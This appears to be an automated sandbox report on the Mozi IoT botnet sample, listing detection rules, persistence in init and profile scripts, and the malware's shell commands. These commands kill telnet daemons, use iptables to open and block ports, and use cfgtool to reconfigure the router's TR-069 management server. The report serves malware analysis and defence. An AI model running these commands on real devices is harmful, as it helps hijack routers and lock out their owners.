Source: Mozi.m, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.linM@0/230@0/0

Persistence and Installation Behavior:

barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 3690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/Mozi.m (PID: 3492) File: /proc/3492/mounts
Sample tries to persist itself using /etc/profile
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/cedilla-portuguese.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/apps-bin-path.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/Z97-byobu.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/bash_completion.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/profile.d/vte-2.91.sh
Sample tries to persist itself using System V runlevels
Source: /tmp/Mozi.m (PID: 3492) File: /etc/rcS.d/S95baby.sh
Source: /tmp/Mozi.m (PID: 3492) File: /etc/rc.local
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 3496) Killall command executed: killall -9 telnetd utelnetd scfgmgr
Creates hidden files and/or directories
Source: /bin/mkdir (PID: 3865) Directory: .cache
Source: /bin/mkdir (PID: 3874) Directory: .cache
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 3496) File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2427/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/235/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/236/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/237/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/238/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/359/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1452/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2420/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/239/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1339/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/16/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/19/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1471/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/240/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/120/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/241/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/483/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/242/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/243/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/244/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1468/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2315/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2315/cmdline
Source: /usr/bin/killall (PID: 3496) File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/245/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1346/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2314/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2314/cmdline
Source: /usr/bin/killall (PID: 3496) File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/246/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/5/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/247/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/6/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/248/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/7/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/249/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/8/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/9/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/20/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/21/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/22/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/23/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/24/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/25/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/26/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/28/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/29/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1363/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1362/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/250/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/251/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/252/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/253/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/254/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/496/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/496/cmdline
Source: /usr/bin/killall (PID: 3496) File opened: /proc/255/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2205/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/256/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/257/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/258/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/259/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2201/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/30/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/31/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/31/cmdline
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2209/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2209/cmdline
Source: /usr/bin/killall (PID: 3496) File opened: /proc/1119/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2220/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/260/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/261/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/262/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/263/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/264/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/385/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/144/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/386/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2217/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/145/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/266/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/146/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2215/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/147/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/148/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/149/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/2211/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/822/stat
Source: /usr/bin/killall (PID: 3496) File opened: /proc/822/cmdline
Source: /usr/bin/killall (PID: 3496) File opened: /proc/47/stat
Executes commands using a shell command-line interpreter
Source: /tmp/Mozi.m (PID: 3494) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/Mozi.m (PID: 3688) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3722) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3733) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3770) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3776) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3803) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3811) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 3815) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4027) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4030) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4033) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4044) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
Source: /tmp/Mozi.m (PID: 4076) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/Mozi.m (PID: 4087) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/Mozi.m (PID: 4100) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4127) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4154) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4175) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4192) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4207) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4235) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4241) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4269) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/Mozi.m (PID: 4279) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/Mozi.m (PID: 4303) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4321) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/Mozi.m (PID: 4351) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4357) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4386) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4397) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4426) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4433) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4462) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT"
Source: /tmp/Mozi.m (PID: 4471) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT"
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/egrep (PID: 3875) Grep executable: /bin/grep -> grep -E [^[:print:]] /home/user/.cache/logrotate/status
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 3690) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Executes the "mkdir" command used to create folders
Source: /sbin/resolvconf (PID: 3646) Mkdir executable: /bin/mkdir -> mkdir -p /run/resolvconf/interface
Source: /bin/dash (PID: 3865) Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/logrotate
Source: /bin/dash (PID: 3874) Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/upstart
Executes the "mktemp" command used to create a temporary unique file name
Source: /bin/dash (PID: 3928) Mktemp executable: /bin/mktemp -> mktemp
Executes the "rm" command used to delete files or directories
Source: /bin/dash (PID: 4018) Rm executable: /bin/rm -> rm -f /tmp/tmp.vHWsTctARt
Reads system information from the proc file system
Source: /tmp/Mozi.m (PID: 3678) Reads from proc file: /proc/stat
Sample tries to set the executable flag
Source: /tmp/Mozi.m (PID: 3492) File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m (PID: 3492) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
Writes ELF files to disk
Source: /tmp/Mozi.m (PID: 3492) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/Mozi.m (PID: 3492) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 11 (Segmentation fault) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directories
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/Mozi.m (PID: 3492) File: /usr/sbin/alsa-info.sh Jump to dropped file

Malware Analysis System Evasion:

barindex
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/dash (PID: 3193) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3225) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3249) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3280) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3305) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3333) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3369) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3397) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3425) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3453) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3534) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3558) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3586) Sleep executable: /bin/sleep -> sleep 1
Source: /bin/dash (PID: 3614) Sleep executable: /bin/sleep -> sleep 1
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/Mozi.m (PID: 3480) Queries kernel information via 'uname':
Source: /tmp/Mozi.m (PID: 3492) Queries kernel information via 'uname':
Source: /tmp/Mozi.m (PID: 3515) Queries kernel information via 'uname':
Source: /sbin/modprobe (PID: 3691) Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 4541) Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 4568) Queries kernel information via 'uname':
Source: kvm-test-1-run.sh.66.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: kvm-test-1-run.sh.66.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.66.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.66.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: functions.sh0.66.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.66.dr Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.66.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm.sh.66.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-recheck-lock.sh.66.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.66.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-test-1-run.sh.66.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.66.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm.sh.66.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.66.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
